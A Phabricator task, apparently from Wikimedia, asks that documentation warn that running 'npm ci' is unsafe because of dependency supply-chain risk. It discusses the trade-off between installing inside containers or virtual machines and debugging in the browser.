Page MenuHomePhabricator

Make it clear that running `npm ci` is not secure
Open, Needs TriagePublic

Description

Running npm ci is dangerous. See How to protect yourself from npm.

We do it in multiple pages:

The advantage of installing dependencies in a container or virtual machine is security, but then debugging with the browser open becomes impossible.

Pages about debugging (one of them is just a draft for now):

For now I've added a warning to all pages that npm ci is not safe.

Event Timeline

zeljkofilipin triaged this task as Medium priority.
zeljkofilipin moved this task from Backlog 🪒 to Deep work 🌊 on the User-zeljkofilipin board.
zeljkofilipin updated the task description. (Show Details)

@Krinkle is the warning about npm ci not being safe enough for now? Do you think we should focus on making debugging possible in a container and/or virtual machine?

zeljkofilipin raised the priority of this task from Medium to Needs Triage.Sep 17 2021, 9:34 AM